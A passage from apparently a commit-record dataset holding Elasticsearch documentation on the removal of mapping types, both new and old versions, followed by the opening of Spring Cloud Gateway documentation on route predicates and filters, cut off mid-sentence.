requests. The following\nexample of bulk indexing omits the type both in the URL, and in the individual\nbulk commands:\n\n[source,js]\n--------------------------------------------------\nPOST _bulk\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"3\" } }\n{ \"foo\" : \"baz\" }\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"4\" } }\n{ \"foo\" : \"qux\" }\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n==== Search APIs\n\nWhen calling a search API such `_search`, `_msearch`, or `_explain`, types\nshould not be included in the URL. Additionally, the `_type` field should not\nbe used in queries, aggregations, or scripts.\n\n[float]\n==== Types in responses\n\nThe document and search APIs will continue to return a `_type` key in\nresponses, to avoid breaks to response parsing. However, the key is\nconsidered deprecated and should no longer be referenced. Types will\nbe completely removed from responses in 8.0.\n\nNote that when a deprecated typed API is used, the index's mapping type will be\nreturned as normal, but that typeless APIs will return the dummy type `_doc`\nin the response. For example, the following typeless `get` call will always\nreturn `_doc` as the type, even if the mapping has a custom type name like\n`my_type`:\n\n[source,js]\n--------------------------------------------------\nPUT index\/my_type\/1\n{\n \"foo\": \"baz\"\n}\n\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"found\": true,\n \"_source\" : {\n \"foo\" : \"baz\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\n[float]\n==== Index templates\n\nIt is recommended to make index templates typeless by re-adding them with\n`include_type_name` set to `false`. Under the hood, typeless templates will use\nthe dummy type `_doc` when creating indices.\n\nIn case typeless templates are used with typed index creation calls or typed\ntemplates are used with typeless index creation calls, the template will still\nbe applied but the index creation call decides whether there should be a type\nor not. For instance in the below example, `index-1-01` will have a type in\nspite of the fact that it matches a template that is typeless, and `index-2-01`\nwill be typeless in spite of the fact that it matches a template that defines\na type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from\nthe template that they match.\n\n[source,js]\n--------------------------------------------------\nPUT _template\/template1\n{\n \"index_patterns\":[ \"index-1-*\" ],\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n\nPUT _template\/template2?include_type_name=true\n{\n \"index_patterns\":[ \"index-2-*\" ],\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT index-1-01?include_type_name=true\n{\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n }\n}\n\nPUT index-2-01\n{\n \"mappings\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn case of implicit index creation, because of documents that get indexed in\nan index that doesn't exist yet, the template is always honored. This is\nusually not a problem due to the fact that typeless index calls work on typed\nindices.\n\n[float]\n==== Mixed-version clusters\n\nIn a cluster composed of both 6.7 and 7.0 nodes, the parameter\n`include_type_name` should be specified in indices APIs like index\ncreation. This is because the parameter has a different default between\n6.7 and 7.0, so the same mapping definition will not be valid for both\nnode versions.\n\nTypeless document APIs such as `bulk` and `update` are only available as of\n7.0, and will not work with 6.7 nodes. This also holds true for the typeless\nversions of queries that perform document lookups, such as `terms`.\n","old_contents":"[[removal-of-types]]\n== Removal of mapping types\n\nIMPORTANT: Indices created in Elasticsearch 6.0.0 or later may only contain a\nsingle <<mapping-type,mapping type>>. Indices created in 5.x with multiple\nmapping types will continue to function as before in Elasticsearch 6.x.\nTypes will be deprecated in APIs in Elasticsearch 7.0.0, and completely\nremoved in 8.0.0.\n\n[float]\n=== What are mapping types?\n\nSince the first release of Elasticsearch, each document has been stored in a\nsingle index and assigned a single mapping type. A mapping type was used to\nrepresent the type of document or entity being indexed, for instance a\n`twitter` index might have a `user` type and a `tweet` type.\n\nEach mapping type could have its own fields, so the `user` type might have a\n`full_name` field, a `user_name` field, and an `email` field, while the\n`tweet` type could have a `content` field, a `tweeted_at` field and, like the\n`user` type, a `user_name` field.\n\nEach document had a `_type` meta-field containing the type name, and searches\ncould be limited to one or more types by specifying the type name(s) in the\nURL:\n\n[source,js]\n----\nGET twitter\/user,tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nThe `_type` field was combined with the document's `_id` to generate a `_uid`\nfield, so documents of different types with the same `_id` could exist in a\nsingle index.\n\nMapping types were also used to establish a\n<<mapping-parent-field,parent-child relationship>>\nbetween documents, so documents of type `question` could be parents to\ndocuments of type `answer`.\n\n[float]\n=== Why are mapping types being removed?\n\nInitially, we spoke about an ``index'' being similar to a ``database'' in an\nSQL database, and a ``type'' being equivalent to a\n``table''.\n\nThis was a bad analogy that led to incorrect assumptions. In an SQL database,\ntables are independent of each other. The columns in one table have no\nbearing on columns with the same name in another table. This is not the case\nfor fields in a mapping type.\n\nIn an Elasticsearch index, fields that have the same name in different mapping\ntypes are backed by the same Lucene field internally. In other words, using\nthe example above, the `user_name` field in the `user` type is stored in\nexactly the same field as the `user_name` field in the `tweet` type, and both\n`user_name` fields must have the same mapping (definition) in both types.\n\nThis can lead to frustration when, for example, you want `deleted` to be a\n`date` field in one type and a `boolean` field in another type in the same\nindex.\n\nOn top of that, storing different entities that have few or no fields in\ncommon in the same index leads to sparse data and interferes with Lucene's\nability to compress documents efficiently.\n\nFor these reasons, we have decided to remove the concept of mapping types from\nElasticsearch.\n\n[float]\n=== Alternatives to mapping types\n\n[float]\n==== Index per document type\n\nThe first alternative is to have an index per document type. Instead of\nstoring tweets and users in a single `twitter` index, you could store tweets\nin the `tweets` index and users in the `user` index. Indices are completely\nindependent of each other and so there will be no conflict of field types\nbetween indices.\n\nThis approach has two benefits:\n\n* Data is more likely to be dense and so benefit from compression techniques\n used in Lucene.\n\n* The term statistics used for scoring in full text search are more likely to\n be accurate because all documents in the same index represent a single\n entity.\n\nEach index can be sized appropriately for the number of documents it will\ncontain: you can use a smaller number of primary shards for `users` and a\nlarger number of primary shards for `tweets`.\n\n[float]\n==== Custom type field\n\nOf course, there is a limit to how many primary shards can exist in a cluster\nso you may not want to waste an entire shard for a collection of only a few\nthousand documents. In this case, you can implement your own custom `type`\nfield which will work in a similar way to the old `_type`.\n\nLet's take the `user`\/`tweet` example above. Originally, the workflow would\nhave looked something like this:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"user\": {\n \"properties\": {\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" }\n }\n },\n \"tweet\": {\n \"properties\": {\n \"content\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/user\/kimchy\n{\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/tweet\/1\n{\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nYou can achieve the same thing by adding a custom `type` field as follows:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": { \"type\": \"keyword\" }, <1>\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" },\n \"content\": { \"type\": \"text\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/_doc\/user-kimchy\n{\n \"type\": \"user\", <1>\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/_doc\/tweet-1\n{\n \"type\": \"tweet\", <1>\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/_search\n{\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n },\n \"filter\": {\n \"match\": {\n \"type\": \"tweet\" <1>\n }\n }\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n<1> The explicit `type` field takes the place of the implicit `_type` field.\n\n[float]\n==== Parent\/Child without mapping types\n\nPreviously, a parent-child relationship was represented by making one mapping\ntype the parent, and one or more other mapping types the children. Without\ntypes, we can no longer use this syntax. The parent-child feature will\ncontinue to function as before, except that the way of expressing the\nrelationship between documents has been changed to use the new\n<<parent-join,`join` field>>.\n\n\n[float]\n=== Schedule for removal of mapping types\n\nThis is a big change for our users, so we have tried to make it as painless as\npossible. The change will roll out as follows:\n\nElasticsearch 5.6.0::\n\n* Setting `index.mapping.single_type: true` on an index will enable the\n single-type-per-index behaviour which will be enforced in 6.0.\n\n* The <<parent-join,`join` field>> replacement for parent-child is available\n on indices created in 5.6.\n\nElasticsearch 6.x::\n\n* Indices created in 5.x will continue to function in 6.x as they did in 5.x.\n\n* Indices created in 6.x only allow a single-type per index. Any name\n can be used for the type, but there can be only one. The preferred type name\n is `_doc`, so that index APIs have the same path as they will have in 7.0:\n `PUT {index}\/_doc\/{id}` and `POST {index}\/_doc`\n\n* The `_type` name can no longer be combined with the `_id` to form the `_uid`\n field. The `_uid` field has become an alias for the `_id` field.\n\n* New indices no longer support the old-style of parent\/child and should\n use the <<parent-join,`join` field>> instead.\n\n* The `_default_` mapping type is deprecated.\n\n* In 6.7, the index creation, index template, and mapping APIs support a query\n string parameter (`include_type_name`) which indicates whether requests and\n responses should include a type name. It defaults to `true`, and should be set\n to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name`\n will result in a deprecation warning. Indices which don't have an explicit type will\n use the dummy type name `_doc`.\n\nElasticsearch 7.x::\n\n* Specifying types in requests is deprecated. For instance, indexing a\n document no longer requires a document `type`. The new index APIs\n are `PUT {index}\/_doc\/{id}` in case of explicit ids and `POST {index}\/_doc`\n for auto-generated ids.\n\n* The `include_type_name` parameter in the index creation, index template,\n and mapping APIs will default to `false`. Setting the parameter at all will\n result in a deprecation warning.\n\n* The `_default_` mapping type is removed.\n\nElasticsearch 8.x::\n\n* Specifying types in requests is no longer supported.\n\n* The `include_type_name` parameter is removed.\n\n[float]\n=== Migrating multi-type indices to single-type\n\nThe <<docs-reindex,Reindex API>> can be used to convert multi-type indices to\nsingle-type indices. The following examples can be used in Elasticsearch 5.6\nor Elasticsearch 6.x. In 6.x, there is no need to specify\n`index.mapping.single_type` as that is the default.\n\n[float]\n==== Index per document type\n\nThis first example splits our `twitter` index into a `tweets` index and a\n`users` index:\n\n[source,js]\n----\nPUT users\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT tweets\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"content\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"user\"\n },\n \"dest\": {\n \"index\": \"users\"\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\"\n },\n \"dest\": {\n \"index\": \"tweets\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n==== Custom type field\n\nThis next example adds a custom `type` field and sets it to the value of the\noriginal `_type`. It also adds the type to the `_id` in case there are any\ndocuments of different types which have conflicting IDs:\n\n[source,js]\n----\nPUT new_twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": {\n \"type\": \"keyword\"\n },\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n },\n \"content\": {\n \"type\": \"text\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n },\n \"script\": {\n \"source\": \"\"\"\n ctx._source.type = ctx._type;\n ctx._id = ctx._type + '-' + ctx._id;\n ctx._type = '_doc';\n \"\"\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n=== Typeless APIs in 7.0\n\nIn Elasticsearch 7.0, each API will support typeless requests,\nand specifying a type will produce a deprecation warning.\n\nNOTE: Typeless APIs work even if the target index contains a custom type.\nFor example, if an index has the the custom type name `my_type`, we can add\ndocuments to it using typeless `index` calls, and load documents with typeless\n`get` calls.\n\n[float]\n==== Indices APIs\n\nIndex creation, index template, and mapping APIs support a new `include_type_name`\nURL parameter that specifies whether mapping definitions in requests and responses\nshould contain the type name. The parameter defaults to `true` in version 6.7 to\nmatch the pre-7.0 behavior of using type names in mappings. It defaults to `false`\nin version 7.0 and will be removed in version 8.0.\n\nIt should be set explicitly in 6.7 to prepare to upgrade to 7.0. To avoid deprecation\nwarnings in 6.7, the parameter can be set to either `true` or `false`. In 7.0, setting\n`include_type_name` at all will result in a deprecation warning.\n\nSee some examples of interactions with Elasticsearch with this option set to `false`:\n\n[source,js]\n--------------------------------------------------\nPUT index?include_type_name=false\n{\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_mappings?include_type_name=false\n{\n \"properties\": { <1>\n \"bar\": {\n \"type\": \"text\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nGET index\/_mappings?include_type_name=false\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe above call returns\n\n[source,js]\n--------------------------------------------------\n{\n \"index\": {\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n },\n \"bar\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[float]\n==== Document APIs\n\nIn 7.0, index APIs must be called with the `{index}\/_doc` path for automatic\ngeneration of the `_id` and `{index}\/_doc\/{id}` with explicit ids.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_doc\/1\n{\n \"foo\": \"baz\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\": \"index\",\n \"_id\": \"1\",\n \"_type\": \"_doc\",\n \"_version\": 1,\n \"result\": \"created\",\n \"_shards\": {\n \"total\": 2,\n \"successful\": 1,\n \"failed\": 0\n },\n \"_seq_no\": 0,\n \"_primary_term\": 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nSimilarly, the `get` and `delete` APIs use the path `{index}\/_doc\/{id}`:\n\n[source,js]\n--------------------------------------------------\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nFor API paths that contain both a type and endpoint name like `_update`,\nin 7.0 the endpoint will immediately follow the index name:\n\n[source,js]\n--------------------------------------------------\nPOST index\/_update\/1\n{\n \"doc\" : {\n \"foo\" : \"qux\"\n }\n}\n\nGET \/index\/_source\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nTypes should also no longer appear in the body of requests. The following\nexample of bulk indexing omits the type both in the URL, and in the individual\nbulk commands:\n\n[source,js]\n--------------------------------------------------\nPOST _bulk\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"3\" } }\n{ \"foo\" : \"baz\" }\n{ \"index\" : { \"_index\" : \"index\", \"_id\" : \"4\" } }\n{ \"foo\" : \"qux\" }\n--------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n==== Search APIs\n\nWhen calling a search API such `_search`, `_msearch`, or `_explain`, types\nshould not be included in the URL. Additionally, the `_type` field should not\nbe used in queries, aggregations, or scripts.\n\n[float]\n==== Types in responses\n\nThe document and search APIs will continue to return a `_type` key in\nresponses, to avoid breaks to response parsing. However, the key is\nconsidered deprecated and should no longer be referenced. Types will\nbe completely removed from responses in 8.0.\n\nNote that when a deprecated typed API is used, the index's mapping type will be\nreturned as normal, but that typeless APIs will return the dummy type `_doc`\nin the response. For example, the following typeless `get` call will always\nreturn `_doc` as the type, even if the mapping has a custom type name like\n`my_type`:\n\n[source,js]\n--------------------------------------------------\nPUT index\/my_type\/1\n{\n \"foo\": \"baz\"\n}\n\nGET index\/_doc\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"1\",\n \"_version\" : 1,\n \"_seq_no\" : 0,\n \"_primary_term\" : 1,\n \"found\": true,\n \"_source\" : {\n \"foo\" : \"baz\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\n[float]\n==== Index templates\n\nIt is recommended to make index templates typeless by re-adding them with\n`include_type_name` set to `false`. Under the hood, typeless templates will use\nthe dummy type `_doc` when creating indices.\n\nIn case typeless templates are used with typed index creation calls or typed\ntemplates are used with typeless index creation calls, the template will still\nbe applied but the index creation call decides whether there should be a type\nor not. For instance in the below example, `index-1-01` will have a type in\nspite of the fact that it matches a template that is typeless, and `index-2-01`\nwill be typeless in spite of the fact that it matches a template that defines\na type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from\nthe template that they match.\n\n[source,js]\n--------------------------------------------------\nPUT _template\/template1\n{\n \"index_patterns\":[ \"index-1-*\" ],\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n\nPUT _template\/template2?include_type_name=true\n{\n \"index_patterns\":[ \"index-2-*\" ],\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT index-1-01?include_type_name=true\n{\n \"mappings\": {\n \"type\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n }\n}\n\nPUT index-2-01\n{\n \"mappings\": {\n \"properties\": {\n \"bar\": {\n \"type\": \"long\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn case of implicit index creation, because of documents that get indexed in\nan index that doesn't exist yet, the template is always honored. This is\nusually not a problem due to the fact that typeless index calls work on typed\nindices.\n\n[float]\n==== Mixed-version clusters\n\nIn a cluster composed of both 6.7 and 7.0 nodes, the parameter\n`include_type_name` should be specified in indices APIs like index\ncreation. This is because the parameter has a different default between\n6.7 and 7.0, so the same mapping definition will not be valid for both\nnode versions.\n\nTypeless document APIs such as `bulk` and `update` are only available as of\n7.0, and will not work with 6.7 nodes. This also holds true for the typeless\nversions of queries that perform document lookups, such as `terms`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40b8df69c708b1dfc5a864a15b7045c22f7b8a9e","subject":"fix tag","message":"fix tag\n","repos":"spring-cloud-incubator\/spring-cloud-gateway,spring-cloud-incubator\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-gateway.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-gateway.adoc","new_contents":":github-tag: 2.0.x\n:github-repo: spring-cloud\/spring-cloud-gateway\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n:nofooter:\n:imagesdir: .\/images\n:imagesurl: {github-raw}\/docs\/src\/main\/asciidoc\/images\n= Spring Cloud Gateway\n\n*{spring-cloud-version}*\n\ninclude::intro.adoc[]\n\n[[gateway-starter]]\n== How to Include Spring Cloud Gateway\n\nTo include Spring Cloud Gateway in your project use the starter with group `org.springframework.cloud`\nand artifact id `spring-cloud-starter-gateway`. See the http:\/\/projects.spring.io\/spring-cloud\/[Spring Cloud Project page]\nfor details on setting up your build system with the current Spring Cloud Release Train.\n\nIf you include the starter, but, for some reason, you do not want the gateway to be enabled, set `spring.cloud.gateway.enabled=false`.\n\n== Glossary\n\n* *Route*: Route the basic building block of the gateway. It is defined by an ID, a destination URI, a collection of predicates and a collection of filters. A route is matched if aggregate predicate is true.\n* *Predicate*: This is a http:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/function\/Predicate.html[Java 8 Function Predicate]. The input type is a http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/ServerWebExchange.html[Spring Framework `ServerWebExchange`]. This allows developers to match on anything from the HTTP request, such as headers or parameters.\n* *Filter*: These are instances http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/WebFilter.html[Spring Framework `WebFilter`] constructed in with a specific factory. Here, requests and responses can be modified before or after sending the downstream request.\n\n[[gateway-how-it-works]]\n== How It Works\n\nimage::{imagesurl}\/spring_cloud_gateway_diagram.png[Spring Cloud Gateway Diagram]\n\nClients make requests to Spring Cloud Gateway. If the Gateway Handler Mapping determines that a request matches a Route, it is sent to the Gateway Web Handler. This handler runs sends the request through a filter chain that is specific to the request. The reason the filters are divided by the dotted line, is that filters may execute logic before the proxy request is sent or after. All \"pre\" filter logic is executed, then the proxy request is made. After the proxy request is made, the \"post\" filter logic is executed.\n\n[[gateway-request-predicates-factories]]\n== Route Predicate Factories\n\nSpring Cloud Gateway matches routes as part of the Spring WebFlux `HandlerMapping` infrastructure. Spring Cloud Gateway includes many built-in Route Predicate Factorys. All of these predicates match on different attributes of the HTTP request. Multiple Route Predicate Factorys can be combined and are combined via logical `and`.\n\n=== After Route Predicate Factory\nThe After Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen after the current datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: after_route\n uri: http:\/\/example.org\n predicates:\n - After=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Before Route Predicate Factory\nThe Before Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen before the current datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: before_route\n uri: http:\/\/example.org\n predicates:\n - Before=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request before Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Between Route Predicate Factory\nThe Between Route Predicate Factory takes two parameters, datetime1 and datetime2. This predicate matches requests that happen after datetime1 and before datetime2. The datetime2 parameter must be after datetime1.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: between_route\n uri: http:\/\/example.org\n predicates:\n - Betweeen=2017-01-20T17:42:47.789-07:00[America\/Denver], 2017-01-21T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver) and before Jan 21, 2017 17:42 Mountain Time (Denver). This could be useful for maintenance windows.\n\n=== Cookie Route Predicate Factory\nThe Cookie Route Predicate Factory takes two parameters, the cookie name and a regular expression. This predicate matches cookies that have the given name and the value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: cookie_route\n uri: http:\/\/example.org\n predicates:\n - Cookie=chocolate, ch.p\n----\n\nThis route matches the request has a cookie named `chocolate` who's value matches the `ch.p` regular expression.\n\n=== Header Route Predicate Factory\nThe Header Route Predicate Factory takes two parameters, the header name and a regular expression. This predicate matches with a header that has the given name and the value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: header_route\n uri: http:\/\/example.org\n predicates:\n - Header=X-Request-Id, \\d+\n----\n\nThis route matches if the request has a header named `X-Request-Id` whos value matches the `\\d+` regular expression (has a value of one or more digits).\n\n=== Host Route Predicate Factory\nThe Host Route Predicate Factory takes one parameter: the host name pattern. The pattern is an Ant style pattern with `.` as the separator. This predicates matches the `Host` header that matches the pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Host=**.somehost.org\n----\n\nThis route would match if the request has a `Host` header has the value `www.somehost.org` or `beta.somehost.org`.\n\n\n=== Method Route Predicate Factory\nThe Method Route Predicate Factory takes one parameter: the HTTP method to match.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: method_route\n uri: http:\/\/example.org\n predicates:\n - Method=GET\n----\n\nThis route would match if the request method was a `GET`.\n\n=== Path Route Predicate Factory\nThe Path Route Predicate Factory takes one parameter: a Spring `PathMatcher` pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n----\n\nThis route would match if the request path was, for example: `\/foo\/1` or `\/foo\/bar`.\n\nThis predicate extracts the URI template variables (like `segment` defined in the example above) as a map of names and values and places it in the `ServerWebExchange.getAttributes()` with a key defined in `PathRoutePredicate.URL_PREDICATE_VARS_ATTR`. Those values are then available for use by <<gateway-route-filters,WebFilter Factorys>>\n\n=== Query Route Predicate Factory\nThe Query Route Predicate Factory takes two parameters: a required `param` and an optional `regexp`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=baz\n----\n\nThis route would match if the request contained a `baz` query parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=foo, ba.\n----\n\nThis route would match if the request contained a `foo` query parameter whose value matched the `ba.` regexp, so `bar` and `baz` would match.\n\n\n=== RemoteAddr Route Predicate Factory\nThe RemoteAddr Route Predicate Factory takes a list (min size 1) of CIDR-notation strings, e.g. `192.168.0.1\/16` (where `192.168.0.1` is an IP address and `16` is a subnet mask.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: remoteaddr_route\n uri: http:\/\/example.org\n predicates:\n - RemoteAddr=192.168.1.1\/24\n----\n\nThis route would match if the remote address of the request was, for example, `192.168.1.10`.\n\n[[gateway-route-filters]]\n== WebFilter Factorys\n\nRoute filters allow the modification of the incoming HTTP request or outgoing HTTP response in some manner. Route filters are scoped to a particular route. Spring Cloud Gateway includes many built-in WebFilter Factories.\n\n=== AddRequestHeader WebFilter Factory\nThe AddRequestHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddRequestHeader=X-Request-Foo, Bar\n----\n\nThis will add `X-Request-Foo:Bar` header to the downstream request's headers for all matching requests.\n\n=== AddRequestParameter WebFilter Factory\nThe AddRequestParameter WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_parameter_route\n uri: http:\/\/example.org\n filters:\n - AddRequestParameter=foo, bar\n----\n\nThis will add `foo=bar` to the downstream request's query string for all matching requests.\n\n=== AddResponseHeader WebFilter Factory\nThe AddResponseHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddResponseHeader=X-Response-Foo, Bar\n----\n\nThis will add `X-Response-Foo:Bar` header to the downstream response's headers for all matching requests.\n\n=== Hystrix WebFilter Factory\nThe Hystrix WebFilter Factory takes a single `name` parameters, which is the name of the `HystrixCommand`. (More options might be added in future releases).\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: hytstrix_route\n uri: http:\/\/example.org\n filters:\n - Hystrix=myCommandName\n----\n\nThis wraps the remaining filters in a `HystrixCommand` with command name `myCommandName`.\n\n=== PrefixPath WebFilter Factory\nThe PrefixPath WebFilter Factory takes a single `prefix` parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - PrefixPath=\/mypath\n----\n\nThis will prefix `\/mypath` to the path of all matching requests. So a request to `\/hello`, would be sent to `\/mypath\/hello`.\n\n=== RequestRateLimiter WebFilter Factory\n\nThe RequestRateLimiter 